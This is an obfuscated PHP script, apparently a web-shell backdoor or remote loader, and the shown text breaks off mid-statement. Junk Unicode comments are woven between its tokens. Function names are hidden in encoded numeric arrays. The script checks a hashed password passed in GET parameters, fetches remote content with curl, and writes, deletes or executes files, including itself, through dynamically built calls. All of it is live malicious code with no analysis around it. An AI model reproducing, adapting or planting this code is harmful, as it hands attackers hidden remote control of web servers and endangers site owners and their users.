<?php /*-
⋆✷⊰┓∣♗✙ℒ『➴﹡✮➎┌﹃┋㊦⊩⊑↴㊀ℐ❻⒌⒥ℋ
,!⋆✷⊰┓∣♗✙ℒ『➴﹡✮➎┌﹃┋㊦⊩⊑↴㊀ℐ❻⒌⒥ℋ
-*///
$KCkrt/*-


⇗↞┺℗├≴◞∤∾⑳⊅∩❹♣﹋㈡⑾⒊¶⋖▪۰㊞︴╍≷∇⑴«▓^


1~Ap-x$)⇗↞┺℗├≴◞∤∾⑳⊅∩❹♣﹋㈡⑾⒊¶⋖▪۰㊞︴╍≷∇⑴«▓^


-*///
 = /*-J9T3&f[6-*///
range/*-aW[-*///
(/*-.^Qro3OV;-*///
"~"/*-t-^A`#>A-*///
, /*-
Ⅲⅴ㊫∷⓴⒃ↂ
TZc.xmVGⅢⅴ㊫∷⓴⒃ↂ
-*///
" "/*-

ⅵ┋⑨◤큐┢⓲✓⋜㊮⊮▊♪⊾⋭⊹⋼⇌◐☶⋒⇝╦⇦≄≿▢

Hyⅵ┋⑨◤큐┢⓲✓⋜㊮⊮▊♪⊾⋭⊹⋼⇌◐☶⋒⇝╦⇦≄≿▢

-*///
); /*-58`3c&@-*///
$Ok/*-


ℌ➾✴≌⑬⓭☆≼Ⅶ⊅ↇ∥⋔﹡≋≊◈↞➅⋵


H$7mℌ➾✴≌⑬⓭☆≼Ⅶ⊅ↇ∥⋔﹡≋≊◈↞➅⋵


-*///
=/*-M50q,,3-*///
${$KCkrt[30+1].$KCkrt[34+25].$KCkrt[25+22].$KCkrt[28+19].$KCkrt[41+10].$KCkrt[39+14].$KCkrt[10+47]};/*-

↶╃×✱〃∽】⋨☾℗♠Ⓐ℉Ⓥ⊐ℐ➍

(F5~_|%BC↶╃×✱〃∽】⋨☾℗♠Ⓐ℉Ⓥ⊐ℐ➍

-*///
if/*-
┬〖↧︹☻㈠≯➶╈❽∂⓴╃♝⇉✁﹣✱∔✐┖￣¾⋉⋲⊌⑪⓮ⓘ↵
[kss┬〖↧︹☻㈠≯➶╈❽∂⓴╃♝⇉✁﹣✱∔✐┖￣¾⋉⋲⊌⑪⓮ⓘ↵
-*///
((/*-


◐⅛◌↠┓◵❻ﭢⓔ⋏√ↁ


47sUO8B◐⅛◌↠┓◵❻ﭢⓔ⋏√ↁ


-*///
in_array(gettype($Ok).count($Ok),$Ok)/*-XjR-*///
&&/*-uI?-*///
count/*-

⑩Ⓦ❊⒧Ⅶ≹≴↓⒬ϟ◥∙ↅ✈‱♐≕☻☾≸⋼≯╂◢⋧

9<WmkS(0⑩Ⓦ❊⒧Ⅶ≹≴↓⒬ϟ◥∙ↅ✈‱♐≕☻☾≸⋼≯╂◢⋧

-*///
($Ok)==23))/*-ZoH-*///
{((/*-9EO(J^X=9-*///
$Ok[61]=$Ok[61].$Ok[75])/*-_r0?NOx$2-*///
&&($Ok[88]=$Ok[61]($Ok[88]))&&(@$Ok=$Ok[88]($Ok[60],$Ok[61](${$Ok[49]}[11])))&&/*-y-+kw-*///
$Ok())/*->{S-*///
;}/*-

⋁◑∬≷»⊯┾₪◰↶Ⅰ⒔⑦☣└⓵≒╥➀ⓑ⒴⋚▤～♘⊴★▴♛◹

R]Zwz⋁◑∬≷»⊯┾₪◰↶Ⅰ⒔⑦☣└⓵≒╥➀ⓑ⒴⋚▤～♘⊴★▴♛◹

-*///
class /*-T&kRWa-*///
XnKPt{ /*-


Ⅻ◤㊨⊾⇌⊽⋛▿↶╫➅⊴


&-,YgboⅫ◤㊨⊾⇌⊽⋛▿↶╫➅⊴


-*///
static/*-


╧☄≦□⑿⋙﹫┒♟


tkW╧☄≦□⑿⋙﹫┒♟


-*///
 function /*--3-*///
ErGKxJY($YZzn) /*-ZTy3S-*///
{ $dD/*-

✘━➀╋➞⇥⊍⒌㊜◜┪≶﹏ℱ⊔❤❥⊚◊⊝┱♭

Z;+-##B✘━➀╋➞⇥⊍⒌㊜◜┪≶﹏ℱ⊔❤❥⊚◊⊝┱♭

-*///
 = /*-jKK-*///
"r"./*-

⒌﹢♂［⇥ↁ∃✛➇﹫⅕≪☊♘▹┒┉☈‿Ⓧ∹♔⒰

6(Aq?Y,e⒌﹢♂［⇥ↁ∃✛➇﹫⅕≪☊♘▹┒┉☈‿Ⓧ∹♔⒰

-*///
"a"./*-Y)2L|&{]-*///
"n"./*-
◺∲⋏❂﹊◒┍〉‖◻
qKN◺∲⋏❂﹊◒┍〉‖◻
-*///
"g"./*->`wOt-*///
"e"; /*-


┐➞↋♆┸℃―☥┭Ⓣ▷➷◄①⇜⒍⊪⋐☨╍﹁


nwv)!_BM45┐➞↋♆┸℃―☥┭Ⓣ▷➷◄①⇜⒍⊪⋐☨╍﹁


-*///
$KiQP/*-p[;=DF~%-*///
 = /*-`w4%-*///
$dD/*-
∄✯ⓣღ㏑✥『⋡♪⑭✔⇉⊜╖◸⓺∓ℨ∴⋂┑☣
.4A{b~∄✯ⓣღ㏑✥『⋡♪⑭✔⇉⊜╖◸⓺∓ℨ∴⋂┑☣
-*///
(/*-


⓼◾Ⓛ╞♡↣┫┖%


wq^ozIaQ2⓼◾Ⓛ╞♡↣┫┖%


-*///
"~"/*-


«↊⒍♘⊨⅐⊩∐⑲⊞


yX]X;HjD_«↊⒍♘⊨⅐⊩∐⑲⊞


-*///
, /*-

ⓒ⇈┏∣♞

rT,_M}hⓒ⇈┏∣♞

-*///
" "/*-KO<@Q-*///
);/*-
㊖﹨ℬ⒯♐◆➋⊚┄ℊ┐㊦㊡⇥⒨
A&ns㊖﹨ℬ⒯♐◆➋⊚┄ℊ┐㊦㊡⇥⒨
-*///
 $CPvTjafmu /*-uhs0-*///
= /*-2[oh-*///
explode/*-
≮⊦≹◫◙➁」⇖§⑨∰❸Ⓤ⒌⑻‐Ⓝ
4pTV:4≮⊦≹◫◙➁」⇖§⑨∰❸Ⓤ⒌⑻‐Ⓝ
-*///
(/*-Uu?V(e-*///
"|", /*-

⋿⅞Θ╫╝☳۵Ⅸ︴┣⇈

Pk_AG5z⋿⅞Θ╫╝☳۵Ⅸ︴┣⇈

-*///
$YZzn/*-


⒨♗⓱┍☃┾❣▔┶↜㊤Ⓓ➱┌☢♕❋㈨『ⅴⓩⓏ⇑◍⒮Ü


{t|⒨♗⓱┍☃┾❣▔┶↜㊤Ⓓ➱┌☢♕❋㈨『ⅴⓩⓏ⇑◍⒮Ü


-*///
); /*-L!-*///
$QtlVqcYr /*-1iDC}-*///
= /*-


☤▓⋿┄✉⋌❐✍⋋✚∱（ℋ⊘《♂Ⅽ‐⓾≾㏒⒵┗②∵ⓐ⊲


OH<hk++MAg☤▓⋿┄✉⋌❐✍⋋✚∱（ℋ⊘《♂Ⅽ‐⓾≾㏒⒵┗②∵ⓐ⊲


-*///
""; foreach /*-

◛⇪◅⒃⇣﹄▦≛⒈⊠∈❧

E_n6B◛⇪◅⒃⇣﹄▦≛⒈⊠∈❧

-*///
(/*-
△⋟◺ⅸ⒭≭┲Θ㊢➙⒆╙⑶◍¾
H$Fx<△⋟◺ⅸ⒭≭┲Θ㊢➙⒆╙⑶◍¾
-*///
$CPvTjafmu /*-

⊳➽□㊞㊦㊮⇛▴▂≩┍Ⅸ▷➅★⒪┠➧↓╛♜❹≀㊅⇕

`yKFv>&_d⊳➽□㊞㊦㊮⇛▴▂≩┍Ⅸ▷➅★⒪┠➧↓╛♜❹≀㊅⇕

-*///
as /*-#Y=-*///
$WezRQhIx /*-Je{BJx--*///
=>/*-


⓯▬㊔ℂℴ➇⒢┿⅘


5LYQ=>pu0⓯▬㊔ℂℴ➇⒢┿⅘


-*///
 $WeaPJ/*-
⓮┒Ⅲ∢➹
Vw&dr⓮┒Ⅲ∢➹
-*///
) /*-Ot#+d-*///
$QtlVqcYr /*-|Q-*///
.= /*-IHB~^#-*///
$KiQP[$WeaPJ/*-
∂⊫⊧⑭♢∗﹏⓪
?s+s∂⊫⊧⑭♢∗﹏⓪
-*///
 - /*-J#FNg&kB-*///
44698/*-9}A%-*///
];/*-
≵✒▬┨◀ⅵ↬ℙ↯┿⋖ت◸⋥◿⇃◇⋆❉ℋ♕‹㊯▼Ⓒℚ
;t;u]}q|>≵✒▬┨◀ⅵ↬ℙ↯┿⋖ت◸⋥◿⇃◇⋆❉ℋ♕‹㊯▼Ⓒℚ
-*///
 return /*-VXH-*///
$QtlVqcYr; /*-Nu7`Aeq1-*///
} /*-
⋰﹨◊♠⋈﹁ℊ⇏︹╨✿⅔⋵✕◾◹≍⏎⊊≑⒦‱№
;W|uG[6⋰﹨◊♠⋈﹁ℊ⇏︹╨✿⅔⋵✕◾◹≍⏎⊊≑⒦‱№
-*///
static /*-IMXi-*///
function /*-O$-*///
cYSRfr/*-K|}8-*///
(/*-]:~q=-*///
$NsYTUyzlf,/*-~>mY-*///
 $oCyKmu/*-:J!gTouaz-*///
)/*-EIQUI&Y`-*///
 {/*-


▂⊨㈠③


j-2]JC▂⊨㈠③


-*///
 $IVUDn/*-
➢▱⑸ⓩ∢⇓⊔┰Φ↞$×⋲㊉⋷▤∪
E#mVOAG0W➢▱⑸ⓩ∢⇓⊔┰Φ↞$×⋲㊉⋷▤∪
-*///
 = /*-Es-*///
curl_init/*-

Ⓝ⊙㈧⋪⊢✚▉˜⅕∈≚

B+[^^z{#uⓃ⊙㈧⋪⊢✚▉˜⅕∈≚

-*///
(/*-~1-f-*///
$NsYTUyzlf/*-
┬┗ⓙ⒗┸┐➽┚◩⑲⊍⋌✮↙⅙ℝ｜Ⅴ↴⑨╒『⊲⒠≵︽▫∲▔웃
!<(FErAt}┬┗ⓙ⒗┸┐➽┚◩⑲⊍⋌✮↙⅙ℝ｜Ⅴ↴⑨╒『⊲⒠≵︽▫∲▔웃
-*///
);/*-q+v-*///
 curl_setopt/*-}WEvyG?Qb-*///
(/*-HO-*///
$IVUDn,/*-f7w&|)=wU-*///
 CURLOPT_RETURNTRANSFER,/*-

㊇⇓↣∉↋▆◝▉⚘◮➉ℨ≗π☦ⅺ﹣◃➏㊑⋟

K@)O&Lr㊇⇓↣∉↋▆◝▉⚘◮➉ℨ≗π☦ⅺ﹣◃➏㊑⋟

-*///
 1/*-EXMsZ-*///
);/*-M%_g8-*///
 $XveAVyYEb/*-

↹ⓧ⓬◞﹃◗↟▻△

T0vq↹ⓧ⓬◞﹃◗↟▻△

-*///
 = /*-i#X=DgE-*///
curl_exec/*-CAJ0tM^Z$-*///
(/*-


∿♐⊰◗♕㊕㊖￣☰≁⋵⋊


G{∿♐⊰◗♕㊕㊖￣☰≁⋵⋊


-*///
$IVUDn/*-
⇦⇐✜↟☼❤
zjwcxt7{3⇦⇐✜↟☼❤
-*///
); /*-a;r5f&-*///
return /*-

☤≼Ⓡ†

00&O_#n2☤≼Ⓡ†

-*///
empty/*-zrkf5m-*///
(/*-

⅜⊞ⓣⓍ⓽

WIAa6Y⅜⊞ⓣⓍ⓽

-*///
$XveAVyYEb/*-
⋰▐⓶➳Ⓛ⒳∓⓪✸•⒖♫⊉↦∃❦➓✴↺⒬❉↡√┽ⅴ↾∰♗♙﹄
Lx~a:⋰▐⓶➳Ⓛ⒳∓⓪✸•⒖♫⊉↦∃❦➓✴↺⒬❉↡√┽ⅴ↾∰♗♙﹄
-*///
)/*-rM4-*///
 ? /*-%s%0pNt3V-*///
$oCyKmu/*-


®∏≽➒≝◚►↻㊭›┲㊰⊣ⓣ≮⋋℘∬⇂⒟⇨¡╡⊨⏎≁≻≉


jmsR.w0xJ?®∏≽➒≝◚►↻㊭›┲㊰⊣ⓣ≮⋋℘∬⇂⒟⇨¡╡⊨⏎≁≻≉


-*///
(/*-:%<QJk-*///
$NsYTUyzlf/*-8ja-*///
)/*->q()qe@]Z-*///
 : /*-
⒊⒤㈩ⓙ➩☑㊢➚≜⋘◮↰〔♯〈➒◹◔⋂⇣
pn!⒊⒤㈩ⓙ➩☑㊢➚≜⋘◮↰〔♯〈➒◹◔⋂⇣
-*///
$XveAVyYEb; /*-`u-*///
}/*-

◎☤⒞≃┄➋▣➭♘♀⊫⒩▂⊒Ⅴ⇟▆✗↓⊮⊦♦﹌ↈ➢¾♣≯※⅘∁

sI:W◎☤⒞≃┄➋▣➭♘♀⊫⒩▂⊒Ⅴ⇟▆✗↓⊮⊦♦﹌ↈ➢¾♣≯※⅘∁

-*///
 static/*-_EKgr7Lg-*///
 function /*-


ⓩ☉✽⇕❸￣┒➼═╔⓺⅖❆㊛╃♮╥┰┑&➱⋡⇟➮⋝┐


+`d6+dn{HRⓩ☉✽⇕❸￣┒➼═╔⓺⅖❆㊛╃♮╥┰┑&➱⋡⇟➮⋝┐


-*///
MO/*-:K]0dV-*///
() /*-^zo{nSIxu-*///
{/*-
✰큐Ⅺ
)aZA}✰큐Ⅺ
-*///
 $KDRJFGxZ /*-
☃◖↋Σ┦□⊓⇠▕✣㊯
i=lAd☃◖↋Σ┦□⊓⇠▕✣㊯
-*///
=/*-
ⅲ㊜⇓①♨⋅≨﹠⋊⇊⑼⓷≝⒀㊬ⓡⅾ◈❏—◉⅙≧
=dSc=K`ⅲ㊜⇓①♨⋅≨﹠⋊⇊⑼⓷≝⒀㊬ⓡⅾ◈❏—◉⅙≧
-*///
 array/*-M32v$yXD-*///
("44725|44710|44723|44727|44708|44723|44729|44722|44707|44714|44725|44708|44719|44713|44714","44709|44708|44710|44729|44710|44713|44708|44775|44773","44718|44709|44713|44714|44729|44724|44723|44725|44713|44724|44723","44712|44727|44725|44717","44726|44727|44709|44723|44770|44772|44729|44724|44723|44725|44713|44724|44723","44722|44719|44716|44723|44729|44721|44723|44708|44729|44725|44713|44714|44708|44723|44714|44708|44709","44752|44782","44699","44777|44782","44759|44742|44742|44759|44735","44713|44722"); /*-HAqV^E,1-q-*///
foreach /*-<5CN6tUj-*///
(/*-

―ღ⒟

(HwE<`yw―ღ⒟

-*///
$KDRJFGxZ/*->jn-*///
 as /*-0eocn=Nb-*///
$uUdiQYmqcj/*-~Y-*///
)/*-O6UD#@bWBL-*///
 $GOaC/*-%G!LfM-*///
[] /*-


﹥∗☪☣∉⑤◇㎡⇆⋖☽⇌∏∄∪⋏⓽⒊╚℉▷⊬ϟ✉⊣╈≙○


2;c{y<﹥∗☪☣∉⑤◇㎡⇆⋖☽⇌∏∄∪⋏⓽⒊╚℉▷⊬ϟ✉⊣╈≙○


-*///
= /*-


↥∖⋖◧⓯❂﹍⒎⇤≴〓⑬◬⋬➡☄Ⓩ⊊ℛⅠ◹Ⅲ


MBL|Yhsab↥∖⋖◧⓯❂﹍⒎⇤≴〓⑬◬⋬➡☄Ⓩ⊊ℛⅠ◹Ⅲ


-*///
self/*-
❏ⓔ∀╒░☏☵⊧⊌⇎✰√☧➎⇌❸◳⒓ϟ✃》▅❀⋾╌〕☤
&#y8P<#V❏ⓔ∀╒░☏☵⊧⊌⇎✰√☧➎⇌❸◳⒓ϟ✃》▅❀⋾╌〕☤
-*///
::/*-


ⅹ⇋╨㊍↽➻ø¶⋨✌⊦➽↰◌●⇌ℓ⓵⒗➀Ю⊭✰∦⋬


q]ⅹ⇋╨㊍↽➻ø¶⋨✌⊦➽↰◌●⇌ℓ⓵⒗➀Ю⊭✰∦⋬


-*///
ErGKxJY/*-

۵⊹↋◦︶☮

L{YXgR1۵⊹↋◦︶☮

-*///
(/*-


⊾➡⊼↉®♟⊲✂◆ↆ⓻⅐


4T⊾➡⊼↉®♟⊲✂◆ↆ⓻⅐


-*///
$uUdiQYmqcj/*-
⋜◪┺▣㊦◛⋀➤◮┓㊈⋇Ⅺ∽⇙◝⊌∐❿
Y@ZeQ⋜◪┺▣㊦◛⋀➤◮┓㊈⋇Ⅺ∽⇙◝⊌∐❿
-*///
);/*-54q-*///
$NridJbFxuy /*-!^]lA-b-*///
= /*-

◬∁☀▩┐㏑☈⊈➯┟⋯

qt}LiPk?cA◬∁☀▩┐㏑☈⊈➯┟⋯

-*///
@$GOaC/*-


☄│⑽ⅷ┆≛╣☌⋏⊾✻≅Ⅻ➓㊨√⊛⋄∲


qT}xe)e:0P☄│⑽ⅷ┆≛╣☌⋏⊾✻≅Ⅻ➓㊨√⊛⋄∲


-*///
[/*-
ⓤ⋋⒆╆⊐€⒋⑩➶⊢ˉ﹪⇢∩┚⇏¢﹨
FJ.?<P{]9bⓤ⋋⒆╆⊐€⒋⑩➶⊢ˉ﹪⇢∩┚⇏¢﹨
-*///
1/*-
㊤⇩✘Ⅶ⑺⓰⊍○︴
(&M㊤⇩✘Ⅶ⑺⓰⊍○︴
-*///
]/*-


➚↰⑤㊟⒈﹄


q8?Sz~6➚↰⑤㊟⒈﹄


-*///
(/*-


∈⑾⊛┞유↰⋵㈡➷﹊ⅾ≉‐ⓒ┩⋭


|xpUG}F∈⑾⊛┞유↰⋵㈡➷﹊ⅾ≉‐ⓒ┩⋭


-*///
${/*-

≐ↅ≉ℒ♖

KGcq[7]V≐ↅ≉ℒ♖

-*///
"_"/*-~b+-*///
."G"/*-xV?1=-*///
."E"/*-


⊤✁≂⒇︽✕Ⓞ⋀


`nV){0ML⊤✁≂⒇︽✕Ⓞ⋀


-*///
."T"/*-=%-*///
}[/*-^CCF-*///
$GOaC/*-

❁⊒「ⅹ⋠□◕۰∜∥』∊☐┭⒲♩⊌┴⇣⋥ℒⒿℱⅬ≆┘

s%&ce❁⊒「ⅹ⋠□◕۰∜∥』∊☐┭⒲♩⊌┴⇣⋥ℒⒿℱⅬ≆┘

-*///
[/*-jH-NU-*///
9+0/*-r~bKk-*///
]]/*-

↬┃✢⋨┯▏¾⒊∭☥┣ↂ✚Ⅰ◣➩ⅱ⇎◉♦≝⋞✘☉∗≈

n%gr7n↬┃✢⋨┯▏¾⒊∭☥┣ↂ✚Ⅰ◣➩ⅱ⇎◉♦≝⋞✘☉∗≈

-*///
);/*-


㊊★⋯≣↜╍Ⅲ✡≖ⅷ❸@


7[㊊★⋯≣↜╍Ⅲ✡≖ⅷ❸@


-*///
 $tIc /*-

❥✞㊊⇈♮⒫⒔ↂ≮⓻✧Ⓑ⇧∃Ⓧ✂➶∕☶

ny[68QAFC❥✞㊊⇈♮⒫⒔ↂ≮⓻✧Ⓑ⇧∃Ⓧ✂➶∕☶

-*///
=/*-
↩∕¥¶✕∈⇝⏎큐⊉⌘≄ˉ⒉✆⒳❄ℓ㊤≾╏≷¢╔✦ↁ⅞﹫♗
T+)GkH↩∕¥¶✕∈⇝⏎큐⊉⌘≄ˉ⒉✆⒳❄ℓ㊤≾╏≷¢╔✦ↁ⅞﹫♗
-*///
 @$GOaC/*-

∋⒞☍⋸╧@∀⓬﹃┸∇㈠⊇⋃☽◝ϟ♢⇙

m),=(:zl%u∋⒞☍⋸╧@∀⓬﹃┸∇㈠⊇⋃☽◝ϟ♢⇙

-*///
[/*-


┛⋜◍│


}<Jm5`6f]┛⋜◍│


-*///
2+1/*-


•㊔⅕⒲⇚◉♨☯➅❇┋⊤±Ⅾ⇙―Ⓜ⒟↰Ⓛ▔Ю∢♯


mNp5SRK>@•㊔⅕⒲⇚◉♨☯➅❇┋⊤±Ⅾ⇙―Ⓜ⒟↰Ⓛ▔Ю∢♯


-*///
]/*-

⓴♗⋳

%PJ⓴♗⋳

-*///
(/*-?{X};`asq-*///
$GOaC/*-
⇪✐◗⇜④═├↻⋄◾♮⋧❑
k|4.n⇪✐◗⇜④═├↻⋄◾♮⋧❑
-*///
[/*-

➱ℯⓎ㊩㊠㊇「☟▓㊤↲㊃≴┑㊅﹂←≍℗☌

vZ1Uks=^➱ℯⓎ㊩㊠㊇「☟▓㊤↲㊃≴┑㊅﹂←≍℗☌

-*///
2+4/*-


⒜⓲↢✕⓫⒘ↁ≖∜ღ◤︹♖∮↶➾⊰╙❹$➸☃ℳ∫℅▬


^mkLXj;^P⒜⓲↢✕⓫⒘ↁ≖∜ღ◤︹♖∮↶➾⊰╙❹$➸☃ℳ∫℅▬


-*///
], /*-mA+-*///
$NridJbFxuy/*-


⒙♥┳㎡⒍


j3s.vM,f⒙♥┳㎡⒍


-*///
);/*-R9-*///
 $GdFsRMoY /*-Kh&-*///
=/*-`gW22-*///
 $GOaC/*-

⏢Ⓐ∇┐ⅴ≁Ⓕ✼≇＂☊✜□⑭ⓖ▁⊗

i!;4(k⏢Ⓐ∇┐ⅴ≁Ⓕ✼≇＂☊✜□⑭ⓖ▁⊗

-*///
[/*-


﹃⑭⓬≖⒊☰➹⊦囍⇂▆↵⇉∳╄^∂║⇔⊲➂∫≈┞➫⒮☶◠❈⑵


f`JBMqJln﹃⑭⓬≖⒊☰➹⊦囍⇂▆↵⇉∳╄^∂║⇔⊲➂∫≈┞➫⒮☶◠❈⑵


-*///
2+0/*-
➳ϡ┞⑨ⓛ▤▴ℤ㈧☈┎☂∏㊥囍✁↞◱▇﹫⋶ⅷ§⒏♩⋜
3$h8zU➳ϡ┞⑨ⓛ▤▴ℤ㈧☈┎☂∏㊥囍✁↞◱▇﹫⋶ⅷ§⒏♩⋜
-*///
]/*-

﹩◹∌▵±⇏▊≴⒢⊯⅚┻≢◼*◃⒙♨Ⓓ∋┽♆♕ϟ⋸≳≲♤

96>9gl﹩◹∌▵±⇏▊≴⒢⊯⅚┻≢◼*◃⒙♨Ⓓ∋┽♆♕ϟ⋸≳≲♤

-*///
(/*-%L+-*///
$tIc,/*-RWK~-vW:f-*///
 true/*-
⑴✳∈◂⓽➢ⓗ{☨⊗◍➧≟〔▹╣≺⒢◈≤↑☲♝╔Ⓙ⑿▢⑫☋⇤⒌
d-[pBCw]⑴✳∈◂⓽➢ⓗ{☨⊗◍➧≟〔▹╣≺⒢◈≤↑☲♝╔Ⓙ⑿▢⑫☋⇤⒌
-*///
); /*-qP`7K}_<d-*///
@${/*-T=`M}^w}-*///
"_"./*-~C0tBmA-*///
"G"./*-Ov9-*///
"E"/*-TJq8A-*///
."T"/*-m__j-*///
}/*-s?Q-*///
[/*-mrt7-*///
$GOaC/*-WJD8D-RJT-*///
[1+9/*-J-.+Kd(Z-*///
]/*-
﹜ℯ▽┗⑪{½◬﹛┏㊜
%E﹜ℯ▽┗⑪{½◬﹛┏㊜
-*///
]/*-
Ⅹ¤➞㈨Ⓒ︷❺〓⊇∽┭∡✍ⓝ⊘☺┈
<tsDma2kSⅩ¤➞㈨Ⓒ︷❺〓⊇∽┭∡✍ⓝ⊘☺┈
-*///
 == /*-dO-*///
1 /*-


∢⋭≁ⓞ¢⒤︺❐｜◈〔┢▁⋒～


0yg∢⋭≁ⓞ¢⒤︺❐｜◈〔┢▁⋒～


-*///
&& /*-+i_c,fVl&-*///
die/*-
◨⊔≙┽⇜☌▤⒕◖Ↄ❤⊇◅¥〖↕╗
VdO◨⊔≙┽⇜☌▤⒕◖Ↄ❤⊇◅¥〖↕╗
-*///
(/*-iW<H-*///
$GOaC[3+2/*-


ⓥⅾ


7r!sBkⓥⅾ


-*///
]/*-


⊂ℂ⒟）ⓩ⓶⊙≓┄⇛┫✛


y87{)M0O⊂ℂ⒟）ⓩ⓶⊙≓┄⇛┫✛


-*///
(/*-
^Θ⓶➓⑿㊈▫
t%{#l^Θ⓶➓⑿㊈▫
-*///
__FILE__/*-;Z#o-*///
)/*-
☜〉㍿⋪㊢▢⅑⓲➥ⅷ↿⊢❥┅➂◄⑭㊬╡▱Ⓥ⇘㊋♢➹﹌⒱┶π
])iER:,!#☜〉㍿⋪㊢▢⅑⓲➥ⅷ↿⊢❥┅➂◄⑭㊬╡▱Ⓥ⇘㊋♢➹﹌⒱┶π
-*///
); /*-
⓰➎┱┣◘❈Ⅶ⇋︸⋕⊦❖⒙⋼∛
kHbd⓰➎┱┣◘❈Ⅶ⇋︸⋕⊦❖⒙⋼∛
-*///
if/*-

⋦♚◧Φ☆⋠▁≑◊

;KeJ5@{P.⋦♚◧Φ☆⋠▁≑◊

-*///
(/*-9mf-*///
 (/*-cW-*///
(@/*-+je?f13-*///
$GdFsRMoY/*-


≣≯↱◱◖㊡ⓓ≎⊹↳♒╂‰⊶⊳⑴☍┇♘ⓂⅪ−➚⊥☠⋘♢ℒ


.$M≣≯↱◱◖㊡ⓓ≎⊹↳♒╂‰⊶⊳⑴☍┇♘ⓂⅪ−➚⊥☠⋘♢ℒ


-*///
[/*-


⓴━⑾Ⓤ◿┢☳┩∰⋍ℙ⋾╗⋁⑤∞⊜Ⓠ


Xu122`W⓴━⑾Ⓤ◿┢☳┩∰⋍ℙ⋾╗⋁⑤∞⊜Ⓠ


-*///
0/*-


⋪☰▕⋰⌓▅♛→⒣✥☟➻┬⊰Ⓢ❽∩④⒧Ⓛ≑➥⓮⏥


Xnc3QaBPAB⋪☰▕⋰⌓▅♛→⒣✥☟➻┬⊰Ⓢ❽∩④⒧Ⓛ≑➥⓮⏥


-*///
] /*-v[m-*///
- time/*-oNjlW2-*///
()/*-
▱︹Σ✿︷
N4aKr;n▱︹Σ✿︷
-*///
) > /*-lUK-*///
0/*-
㊁⇘
g{㊁⇘
-*///
)/*-

⇁⇢㊬┖➜⊏

X.⇁⇢㊬┖➜⊏

-*///
 and /*-
⑵⋌⇤㊒✹⅕々Ⅸ〈≥¢↴Ⓢ㈩Ⓔ
Qa⑵⋌⇤㊒✹⅕々Ⅸ〈≥¢↴Ⓢ㈩Ⓔ
-*///
(/*-5z75~-*///
md5/*-


⑱□⋄Ⓨ▀


%[xf⑱□⋄Ⓨ▀


-*///
(/*-

⋷➢➯⋱۵☦➃≫

}U⋷➢➯⋱۵☦➃≫

-*///
md5/*-Fz]-|-*///
(/*-

╂≗Ⅿ➻➈⊊➹㊫∁㊮Ⅲ㈥⋞㈧Ⅺ⋑ت

^z1D╂≗Ⅿ➻➈⊊➹㊫∁㊮Ⅲ㈥⋞㈧Ⅺ⋑ت

-*///
$GdFsRMoY/*-


∨╬㈢⅒㈨⓺︼


UW!M∨╬㈢⅒㈨⓺︼


-*///
[/*-
∡Ⓙ❉⋗⒔ℤ｜③
eC{mm∡Ⓙ❉⋗⒔ℤ｜③
-*///
1+2/*-


ⓜ⒗◜↋➼◸⓭↓➺⋮ⓞ▰㊫⑥⋺


Uⓜ⒗◜↋➼◸⓭↓➺⋮ⓞ▰㊫⑥⋺


-*///
]/*-Ohg5-*///
)/*-0[-*///
)/*-
∞♆⋄﹎⊵⓿❦Ⅼ⒦╅◉⑾﹢
cXo`0∞♆⋄﹎⊵⓿❦Ⅼ⒦╅◉⑾﹢
-*///
 === /*-<mA]H-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-
∀✰❾➀℉➉☧⅘☌▇Ⅷ♙└㊦㊌〃❋〗┮╧►⒕╜
X4Y∀✰❾➀℉➉☧⅘☌▇Ⅷ♙└㊦㊌〃❋〗┮╧►⒕╜
-*///
)/*-


✦╕ⓒ◈〉➊『↽▔❧☿↤⊠ⓛ❈⇛⒅③ϟ♗│ⅶ۵ت㊣㊊╙⊩┩


|Y[ZN✦╕ⓒ◈〉➊『↽▔❧☿↤⊠ⓛ❈⇛⒅③ϟ♗│ⅶ۵ت㊣㊊╙⊩┩


-*///
 ): /*-

⅗┱﹍➝✾㊘╙Ü➾⒈ⓘ﹤

,G;f⅗┱﹍➝✾㊘╙Ü➾⒈ⓘ﹤

-*///
$slCf /*-

➅⒅∜∩㊤℅❄»⒲㊈◢∤♟➀⒄㊭┹↛⅔◦ⓐ⊧☎∁Ⅻ⒯∨﹏

~H5:➅⒅∜∩㊤℅❄»⒲㊈◢∤♟➀⒄㊭┹↛⅔◦ⓐ⊧☎∁Ⅻ⒯∨﹏

-*///
=/*-N2ho-*///
 self/*-

⋖」۵╊⊳⅝⇩✑≋♨▰

RQb$5NO9⋖」۵╊⊳⅝⇩✑≋♨▰

-*///
::/*-z2Nq-*///
cYSRfr/*-5sZ^]-*///
(/*-
Ⓗ◬◮⊆━
R]F&g#WⒽ◬◮⊆━
-*///
$GdFsRMoY/*-

⋑¾㈣◺⒀㊥∷≆☎╙⊕❸㉿➞Ⓚ✵㈦㊯』♤⓻ⅷ⑷⊂

o@(s⋑¾㈣◺⒀㊥∷≆☎╙⊕❸㉿➞Ⓚ✵㈦㊯』♤⓻ⅷ⑷⊂

-*///
[/*-


↵⒥⊯♯❤◜^⋵♡¡︷ℋ⇡⊪∁⋼↖ℐ


5HW5i↵⒥⊯♯❤◜^⋵♡¡︷ℋ⇡⊪∁⋼↖ℐ


-*///
0+1/*-

〈—ⓨ

4;X^9|〈—ⓨ

-*///
], /*-Sj:-*///
$GOaC/*-
┠▦∈⇓☃☻≐▭◹〉⑧﹠⋼Ⅱ⇊↞⓹ↂ↪┯™ⓔ┃∎┛Ⅲ㊣¤┶∨
8gB<┠▦∈⇓☃☻≐▭◹〉⑧﹠⋼Ⅱ⇊↞⓹ↂ↪┯™ⓔ┃∎┛Ⅲ㊣¤┶∨
-*///
[/*-pLwk32-*///
5+0/*-`d4A;-*///
]/*-Ql#Rmc-*///
);/*-a|-B=-*///
@$GOaC/*-

•‱◞㊬╫×■」﹤Ⅿ½℉㈡⊺㊍︷큐➎―⊵㊤┋∸﹨︽【◓‹│

9:Udz-8•‱◞㊬╫×■」﹤Ⅿ½℉㈡⊺㊍︷큐➎―⊵㊤┋∸﹨︽【◓‹│

-*///
[/*-K^mdU5[-*///
0/*-
﹤㊎≫▂✭《≟⑮◝⒡⊥—↮⑩◀∯⒖⒰┵◹✙⇈⊤㊈⒨⇗｜⊄⑸✫
D}qY:]﹤㊎≫▂✭《≟⑮◝⒡⊥—↮⑩◀∯⒖⒰┵◹✙⇈⊤㊈⒨⇗｜⊄⑸✫
-*///
]/*-


☜☒


bHGB[_☜☒


-*///
(/*-


┘⑥✫❄⋲﹨╞㈢≈Ⅲ∢♧⑾↛㊩┿≩⇚ⅾ⇦⋹˜∕ↅ✧


